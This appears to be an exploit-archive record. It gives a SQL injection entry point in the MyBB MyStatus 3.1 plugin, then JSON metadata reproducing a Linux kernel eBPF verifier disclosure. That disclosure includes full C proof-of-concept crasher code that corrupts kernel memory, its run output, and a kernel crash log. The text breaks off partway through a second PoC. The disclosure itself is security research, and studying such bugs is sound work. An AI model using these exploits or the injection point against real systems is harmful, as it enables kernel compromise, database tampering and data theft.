ID 1337DAY-ID-16996
Type zdt
Reporter Mario_Vs
Modified 2011-10-11T00:00:00
Description
Exploit for php platform in category web applications
---------------------------------------------------------------------
Exploit Title : MyBB MyStatus 3.1
---------------------------------------------------------------------
Author : Mario_Vs
Date : 10/10/2011
Site : http://mariovs.pl/
@ : mario_vs[at]o2.pl
---------------------------------------------------------------------
Description >
Vendor : http://mods.mybb.com/download/mystatus
Tested On : Windows 7
---------------------------------------------------------------------
SQL Injection
http://localhost/mybb/process-mystatus.php?action=delete&statid=[SQLi]
---------------------------------------------------------------------
---------------------------------------------------------------------
Greets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2
All users: HackinQ.pl
# 0day.today [2018-01-08] #
{"hash": "dad75044b3cc791f7a8032ce4609092409f7a12ee4cfbc34b531622d0c443756", "id": "1337DAY-ID-16996", "lastseen": "2018-01-08T23:02:20", "viewCount": 3, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "79fda2751df384ee33bc0f81cfdb121d", "key": "href"}, {"hash": "1dc677035809cbeaa0102b0f66772969", "key": "modified"}, {"hash": "1dc677035809cbeaa0102b0f66772969", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "794f037ba8f99725492b9271501217b6", "key": "reporter"}, {"hash": "0d42b24d026ff7bf93bd0fbb70c81bc1", "key": "sourceData"}, {"hash": "aeb41974b1969395000674f99524b0b5", "key": "sourceHref"}, {"hash": "95ab27474d65e9a3e99463b0cffd8a42", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-29285", "1337DAY-ID-16168"]}, {"type": "cve", "idList": ["CVE-2013-1690"]}], "modified": "2018-01-08T23:02:20"}, "vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16996", "description": "Exploit for php platform in category web applications", "title": "MyBB MyStatus 3.1 SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "5e7aeba75eed1c2d339ba8b989a4ac5cf20ecc7f2bfa3a018b43fe8434a3d456", "id": "1337DAY-ID-16996", "lastseen": "2016-04-20T01:30:49", "enchantments": {"score": {"value": 6.1, "modified": "2016-04-20T01:30:49"}}, "hashmap": [{"hash": "1dc677035809cbeaa0102b0f66772969", "key": "modified"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "95ab27474d65e9a3e99463b0cffd8a42", "key": "title"}, {"hash": "794f037ba8f99725492b9271501217b6", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1dc677035809cbeaa0102b0f66772969", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "5a08c389d19b9013e34484540cb6cc63", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "ac78b44d5059ad1a67bac1544e68bfe0", "key": "sourceData"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "b56332c265dd77752c561539861c7bfd", "key": "sourceHref"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/16996", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "MyBB MyStatus 3.1 SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "\ufeff---------------------------------------------------------------------\r\nExploit Title : MyBB MyStatus 3.1\r\n---------------------------------------------------------------------\r\n \r\nAuthor : Mario_Vs\r\nDate : 10/10/2011\r\nSite : http://mariovs.pl/\r\n@ : mario_vs[at]o2.pl\r\n---------------------------------------------------------------------\r\n \r\nDescription >\r\n \r\nVendor : http://mods.mybb.com/download/mystatus\r\nTested On : Windows 7\r\n---------------------------------------------------------------------\r\n \r\nSQL Injection\r\n \r\nhttp://localhost/mybb/process-mystatus.php?action=delete&statid=[SQLi]\r\n---------------------------------------------------------------------\r\n \r\n---------------------------------------------------------------------\r\n \r\nGreets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2\r\n \r\nAll users: HackinQ.pl\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2011-10-11T00:00:00", "references": [], "reporter": "Mario_Vs", "modified": "2011-10-11T00:00:00", "href": "http://0day.today/exploit/description/16996"}, "lastseen": "2016-04-20T01:30:49", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "\ufeff---------------------------------------------------------------------\r\nExploit Title : MyBB MyStatus 3.1\r\n---------------------------------------------------------------------\r\n \r\nAuthor : Mario_Vs\r\nDate : 10/10/2011\r\nSite : http://mariovs.pl/\r\n@ : mario_vs[at]o2.pl\r\n---------------------------------------------------------------------\r\n \r\nDescription >\r\n \r\nVendor : http://mods.mybb.com/download/mystatus\r\nTested On : Windows 7\r\n---------------------------------------------------------------------\r\n \r\nSQL Injection\r\n \r\nhttp://localhost/mybb/process-mystatus.php?action=delete&statid=[SQLi]\r\n---------------------------------------------------------------------\r\n \r\n---------------------------------------------------------------------\r\n \r\nGreets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2\r\n \r\nAll users: HackinQ.pl\r\n\r\n\n\n# 0day.today [2018-01-08] #", "published": "2011-10-11T00:00:00", "references": [], "reporter": "Mario_Vs", "modified": "2011-10-11T00:00:00", "href": "https://0day.today/exploit/description/16996"}
{"cve": [{"lastseen": "2018-01-10T18:01:46", "bulletinFamily": "NVD", "description": "kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging register truncation mishandling.", "modified": "2018-01-09T12:48:28", "published": "2017-12-27T12:08:17", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16996", "id": "CVE-2017-16996", "type": "cve", "title": "CVE-2017-16996", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:38:41", "bulletinFamily": "NVD", "description": "Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 do not properly handle onreadystatechange events in conjunction with page reloading, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted web site that triggers an attempt to execute data at an unmapped memory location.", "modified": "2017-09-18T21:36:10", "published": "2013-06-25T23:19:10", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1690", "id": "CVE-2013-1690", "title": "CVE-2013-1690", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-01T13:00:47", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2017-12-22T00:00:00", "published": "2017-12-22T00:00:00", "href": "https://0day.today/exploit/description/29285", "id": "1337DAY-ID-29285", "type": "zdt", "title": "Linux Kernel >= 4.9 eBPF memory corruption bugs Vulnerability", "sourceData": "Hi!\r\n\r\nA few BPF verifier bugs in the Linux kernel, most of which can be used\r\nfor controlled memory corruption, have been fixed over the last days.\r\nOne of the bugs was introduced in 4.9, the others were only introduced\r\nin 4.14.\r\n\r\nThe fixes are in the net tree of the Linux kernel\r\n(https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/log/kernel/bpf),\r\nbut not in Linus' tree yet.\r\n\r\nThe following bug was introduced in 4.9:\r\n\r\n=== fixed by \"bpf: fix incorrect sign extension in check_alu_op()\" ===\r\ncheck_alu_op() did not distinguish between\r\nBPF_ALU64|BPF_MOV|BPF_K (load 32-bit immediate, sign-extended to 64-bit)\r\nand BPF_ALU|BPF_MOV|BPF_K (load 32-bit immediate, zero-padded to 64-bit);\r\nit performed sign extension in both cases.\r\nDebian assigned CVE-2017-16995 for this issue.\r\n\r\n\r\nThe following bugs were introduced in 4.14:\r\n\r\n=== fixed by \"bpf/verifier: fix bounds calculation on BPF_RSH\" ===\r\nIncorrect signed bounds were being computed for BPF_RSH.\r\nIf the old upper signed bound was positive and the old lower signed bound was\r\nnegative, this could cause the new upper signed bound to be too low,\r\nleading to security issues.\r\n\r\n=== fixed by \"bpf: fix incorrect tracking of register size truncation\" ===\r\nThe BPF verifier did not properly handle register truncation to a smaller size.\r\n\r\nThe old code first mirrors the clearing of the high 32 bits in the bitwise\r\ntristate representation, which is correct. But then, it computes the new\r\narithmetic bounds as the intersection between the old arithmetic bounds and\r\nthe bounds resulting from the bitwise tristate representation. Therefore,\r\nwhen coerce_reg_to_32() is called on a number with bounds\r\n[0xffff'fff8, 0x1'0000'0007], the verifier computes\r\n[0xffff'fff8, 0xffff'ffff] as bounds of the truncated number.\r\nThis is incorrect: The truncated number could also be in the range [0, 7],\r\nand no meaningful arithmetic bounds can be computed in that case apart from\r\nthe obvious [0, 0xffff'ffff].\r\nDebian assigned CVE-2017-16996 for this issue.\r\n\r\n=== fixed by \"bpf: fix 32-bit ALU op verification\" ===\r\nadjust_scalar_min_max_vals() only truncates its inputs and otherwise operates on\r\n64-bit numbers while the BPF interpreter and JIT perform 32-bit arithmetic.\r\nThis means that the output of e.g. `(u32)0x40000000*(u32)5` will be incorrect.\r\nTo test this, you can use the following BPF code:\r\n\r\n BPF_MOV32_IMM(BPF_REG_1, 0x40000000),\r\n BPF_ALU32_IMM(BPF_MUL, BPF_REG_1, 5),\r\n BPF_EXIT_INSN()\r\n\r\nThe verifier generates the following output, which is incorrect:\r\n\r\n 0: R1=ctx(id=0,off=0,imm=0) R10=fp0\r\n 0: (b4) (u32) r1 = (u32) 1073741824\r\n 1: R1=inv1073741824 R10=fp0\r\n 1: (24) (u32) r1 *= (u32) 5\r\n 2: R1=inv5368709120 R10=fp0\r\n 2: (95) exit\r\n R0 !read_ok\r\n\r\n=== fixed by \"bpf: fix missing error return in check_stack_boundary()\" ===\r\ncheck_stack_boundary() prints an error into the verifier log, but doesn't\r\nexit, when a stack pointer doesn't have a known offset. This should be\r\nusable to get read+write access to spilled stack pointers.\r\n\r\n=== fixed by \"bpf: force strict alignment checks for stack pointers\" ===\r\nThe verifier did not force strict alignment checks for stack pointers, but\r\nthe tracking of stack spills relies on it; unaligned stack accesses can\r\nlead to corruption of spilled registers, which is exploitable.\r\n\r\n=== fixed by \"bpf: don't prune branches when a scalar is replaced with\r\na pointer\" ===\r\nThe BPF verifier pruned branches when a scalar is replaced with\r\na pointer, explicitly permitting confusing a pointer into a number\r\n(but not the other way around). This is a kernel pointer leak.\r\n\r\n=== fixed by \"bpf: fix integer overflows\" ===\r\nThere were various issues related to the limited size of integers used in\r\nthe verifier:\r\n - `off + size` overflow in __check_map_access()\r\n - `off + reg->off` overflow in check_mem_access()\r\n - `off + reg->var_off.value` overflow or 32-bit truncation of\r\n `reg->var_off.value` in check_mem_access()\r\n - 32-bit truncation in check_stack_boundary()\r\n\r\n\r\n\r\nCrash PoCs for some of these issues are at\r\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1454,\r\nbut since oss-security prefers having PoCs in the mail directly, I've\r\npasted the PoCs below.\r\nFor the other issues, examples of how to trigger them are in the\r\nadded BPF selftests.\r\nThe rest of the mail is just PoC code, so if you're not interested\r\nin the PoCs, you can stop reading now.\r\n\r\n\r\n\r\n\r\n=== PoC for \"bpf: fix incorrect sign extension in check_alu_op()\" ===\r\nHere is a crasher that tries to write to a noncanonical address.\r\nNote that it is only designed to work on 4.14.\r\n\r\n======================================\r\n[email\u00a0protected]:~/bpf_range$ cat crasher_badimm.c\r\n#define _GNU_SOURCE\r\n#include <err.h>\r\n#include <stdint.h>\r\n#include <linux/bpf.h>\r\n#include <linux/filter.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <sys/syscall.h>\r\n#include <asm/unistd_64.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n\r\n/* start from kernel */\r\n#define BPF_EMIT_CALL(FUNC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_CALL, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = (FUNC) }) /* ??? */\r\n#define BPF_MOV32_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_REG_ARG1 BPF_REG_1\r\n#define BPF_REG_ARG2 BPF_REG_2\r\n#define BPF_REG_ARG3 BPF_REG_3\r\n#define BPF_REG_ARG4 BPF_REG_4\r\n#define BPF_REG_ARG5 BPF_REG_5\r\n#define BPF_PSEUDO_MAP_FD 1\r\n#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LD | BPF_DW | BPF_IMM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = (__u32) (IMM) }), \\\r\n ((struct bpf_insn) { \\\r\n .code = 0, /* zero is reserved opcode */ \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = ((__u64) (IMM)) >> 32 })\r\n#define BPF_ALU32_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_LD_MAP_FD(DST, MAP_FD) \\\r\n BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)\r\n#define BPF_ALU32_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_EXIT_INSN() \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_EXIT, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* Memory store, *(uint *) (dst_reg + off16) = src_reg */\r\n#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_REG_FP BPF_REG_10\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_ALU64_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_REG_TMP BPF_REG_8\r\n#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_JMP_IMM(OP, DST, IMM, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = OFF, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_ALU64_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_MOV32_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* end from kernel */\r\n\r\n\r\nint bpf_(int cmd, union bpf_attr *attrs) {\r\n return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));\r\n}\r\n\r\nvoid array_set(int mapfd, uint32_t key, uint32_t value) {\r\n union bpf_attr attr = {\r\n .map_fd = mapfd,\r\n .key = (uint64_t)&key,\r\n .value = (uint64_t)&value,\r\n .flags = BPF_ANY,\r\n };\r\n\r\n\r\n int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);\r\n if (res)\r\n err(1, \"map update elem\");\r\n}\r\n\r\n\r\nint main(void) {\r\n union bpf_attr create_map_attrs = {\r\n .map_type = BPF_MAP_TYPE_ARRAY,\r\n .key_size = 4,\r\n .value_size = 8,\r\n .max_entries = 16\r\n };\r\n int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);\r\n if (mapfd == -1)\r\n err(1, \"map create\");\r\n\r\n\r\n array_set(mapfd, 1, 1);\r\n\r\n char verifier_log[100000];\r\n struct bpf_insn insns[] = {\r\n BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),\r\n\r\n // fill r0 with pointer to map value\r\n BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack\r\n BPF_MOV32_IMM(BPF_REG_ARG2, 1),\r\n BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),\r\n BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),\r\n BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),\r\n BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),\r\n BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit\r\n BPF_EXIT_INSN(), // exit\r\n\r\n // r1 = 0xffff'ffff, mistreated as 0xffff'ffff'ffff'ffff\r\n BPF_MOV32_IMM(BPF_REG_1, 0xffffffff),\r\n // r1 = 0x1'0000'0000, mistreated as 0\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1),\r\n // r1 = 0x1000'0000'0000'0000, mistreated as 0\r\n BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 28),\r\n\r\n // compute noncanonical pointer\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),\r\n\r\n // crash by writing to noncanonical pointer\r\n BPF_MOV32_IMM(BPF_REG_1, 0xdeadbeef),\r\n BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, 0),\r\n\r\n // terminate to make the verifier happy\r\n BPF_MOV32_IMM(BPF_REG_0, 0),\r\n BPF_EXIT_INSN()\r\n };\r\n union bpf_attr create_prog_attrs = {\r\n .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,\r\n .insn_cnt = sizeof(insns) / sizeof(insns[0]),\r\n .insns = (uint64_t)insns,\r\n .license = (uint64_t)\"\",\r\n .log_level = 2,\r\n .log_size = sizeof(verifier_log),\r\n .log_buf = (uint64_t)verifier_log\r\n };\r\n int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);\r\n if (progfd == -1) {\r\n perror(\"prog load\");\r\n puts(verifier_log);\r\n return 1;\r\n }\r\n puts(\"ok so far?\");\r\n\r\n int socks[2];\r\n if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))\r\n err(1, \"socketpair\");\r\n if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))\r\n err(1, \"setsockopt\");\r\n if (write(socks[1], \"a\", 1) != 1)\r\n err(1, \"write\");\r\n char c;\r\n if (read(socks[0], &c, 1) != 1)\r\n err(1, \"read res\");\r\n return 0;\r\n}\r\n[email\u00a0protected]:~/bpf_range$ gcc -o crasher_badimm crasher_badimm.c -Wall\r\n&& ./crasher_badimm\r\nok so far?\r\nSegmentation fault\r\n======================================\r\n\r\n\r\nHere is the resulting crash (note the corrupted heap address in R15):\r\n\r\n======================================\r\n[10599.403881] general protection fault: 0000 [#6] SMP KASAN\r\n[10599.403886] Modules linked in: binfmt_misc snd_hda_codec_generic\r\ncrct10dif_pclmul crc32_pclmul ghash_clmulni_intel snd_hda_intel\r\nsnd_hda_codec pcbc snd_hda_core qxl snd_hwdep snd_pcm snd_timer ttm\r\naesni_intel snd ppdev aes_x86_64 drm_kms_helper parport_pc crypto_simd\r\nsoundcore glue_helper drm parport evdev cryptd sg serio_raw pcspkr\r\nvirtio_console virtio_balloon button ip_tables x_tables autofs4 ext4\r\ncrc16 mbcache jbd2 fscrypto sr_mod cdrom sd_mod ata_generic 8139too\r\nehci_pci ata_piix uhci_hcd libata ehci_hcd 8139cp crc32c_intel mii\r\nvirtio_pci psmouse usbcore virtio_ring scsi_mod virtio i2c_piix4\r\nfloppy\r\n[10599.403952] CPU: 7 PID: 1610 Comm: crasher_badimm Tainted: G B D\r\n 4.15.0-rc1+ #4\r\n[10599.403954] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),\r\nBIOS 1.10.2-1 04/01/2014\r\n[10599.403957] task: 000000004ae6ce3e task.stack: 000000006149ccc2\r\n[10599.403963] RIP: 0010:___bpf_prog_run+0x1a77/0x2490\r\n[10599.403966] RSP: 0018:ffff8801ef6bf838 EFLAGS: 00010292\r\n[10599.403969] RAX: 0000000000000000 RBX: ffffc900016150b8 RCX: ffffffff866483d7\r\n[10599.403971] RDX: 0000000000000001 RSI: 0000000000000004 RDI: 0fff8801ac393b78\r\n[10599.403974] RBP: ffff8801ef6bf968 R08: 0000000000000000 R09: 0000000000000000\r\n[10599.403976] R10: 0000000000000001 R11: ffffed00358726b9 R12: ffffffff870be980\r\n[10599.403978] R13: 1ffff1003ded7f0e R14: 00000000deadbeef R15: 0fff8801ac393b78\r\n[10599.403981] FS: 00007fd705b43700(0000) GS:ffff8801f77c0000(0000)\r\nknlGS:0000000000000000\r\n[10599.403984] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[10599.403986] CR2: 0000561c31a24008 CR3: 00000001b153b002 CR4: 00000000001606e0\r\n[10599.403991] Call Trace:\r\n[10599.403997] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[10599.404000] ? bpf_jit_compile+0x30/0x30\r\n[10599.404006] ? alloc_skb_with_frags+0x90/0x2c0\r\n[10599.404010] ? __bpf_prog_run32+0x83/0xc0\r\n[10599.404013] ? __bpf_prog_run64+0xc0/0xc0\r\n[10599.404017] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[10599.404022] ? sk_filter_trim_cap+0xf7/0x4e0\r\n[10599.404028] ? unix_dgram_sendmsg+0x3e2/0x960\r\n[10599.404033] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404036] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404040] ? sock_alloc_inode+0x46/0x110\r\n[10599.404043] ? unix_stream_connect+0x840/0x840\r\n[10599.404046] ? __sock_create+0x7f/0x2c0\r\n[10599.404049] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404054] ? __lock_acquire.isra.31+0x2d/0xb40\r\n[10599.404059] ? __wake_up_common_lock+0xaf/0x130\r\n[10599.404065] ? unix_stream_connect+0x840/0x840\r\n[10599.404068] ? sock_sendmsg+0x6b/0x80\r\n[10599.404071] ? sock_write_iter+0x11d/0x1d0\r\n[10599.404075] ? sock_sendmsg+0x80/0x80\r\n[10599.404080] ? do_raw_spin_unlock+0x86/0x120\r\n[10599.404084] ? iov_iter_init+0x77/0xb0\r\n[10599.404089] ? __vfs_write+0x23e/0x340\r\n[10599.404092] ? kernel_read+0xa0/0xa0\r\n[10599.404098] ? __fd_install+0x5/0x160\r\n[10599.404102] ? __fget_light+0x9b/0xb0\r\n[10599.404107] ? vfs_write+0xe9/0x240\r\n[10599.404110] ? SyS_write+0xa7/0x130\r\n[10599.404121] ? SyS_read+0x130/0x130\r\n[10599.404125] ? lockdep_sys_exit+0x16/0x8e\r\n[10599.404129] ? lockdep_sys_exit_thunk+0x16/0x2b\r\n[10599.404133] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404138] Code: 00 48 0f bf 43 fa 49 01 c7 0f b6 43 f9 c0 e8 04\r\n0f b6 c0 4c 8d 74 c5 00 4c 89 f7 e8 04 4a 0f 00 4d 8b 36 4c 89 ff e8\r\n79 49 0f 00 <45> 89 37 e9 17 e6 ff ff 48 8d 7b 01 e8 58 47 0f 00 0f b6\r\n43 01\r\n[10599.404200] RIP: ___bpf_prog_run+0x1a77/0x2490 RSP: ffff8801ef6bf838\r\n[10599.404204] ---[ end trace e8c17e9abe81bd46 ]---\r\n======================================\r\n\r\n\r\n\r\n\r\n=== PoC for \"bpf: fix incorrect tracking of register size truncation\" ===\r\nHere is a crasher that uses this to again write to a noncanonical address:\r\n\r\n\r\n======================================\r\n#define _GNU_SOURCE\r\n#include <err.h>\r\n#include <stdint.h>\r\n#include <linux/bpf.h>\r\n#include <linux/filter.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <sys/syscall.h>\r\n#include <asm/unistd_64.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n\r\n/* start from kernel */\r\n#define BPF_EMIT_CALL(FUNC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_CALL, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = (FUNC) }) /* ??? */\r\n#define BPF_MOV32_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_REG_ARG1 BPF_REG_1\r\n#define BPF_REG_ARG2 BPF_REG_2\r\n#define BPF_REG_ARG3 BPF_REG_3\r\n#define BPF_REG_ARG4 BPF_REG_4\r\n#define BPF_REG_ARG5 BPF_REG_5\r\n#define BPF_PSEUDO_MAP_FD 1\r\n#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LD | BPF_DW | BPF_IMM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = (__u32) (IMM) }), \\\r\n ((struct bpf_insn) { \\\r\n .code = 0, /* zero is reserved opcode */ \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = ((__u64) (IMM)) >> 32 })\r\n#define BPF_ALU32_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_LD_MAP_FD(DST, MAP_FD) \\\r\n BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)\r\n#define BPF_ALU32_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_EXIT_INSN() \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_EXIT, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* Memory store, *(uint *) (dst_reg + off16) = src_reg */\r\n#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_REG_FP BPF_REG_10\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n 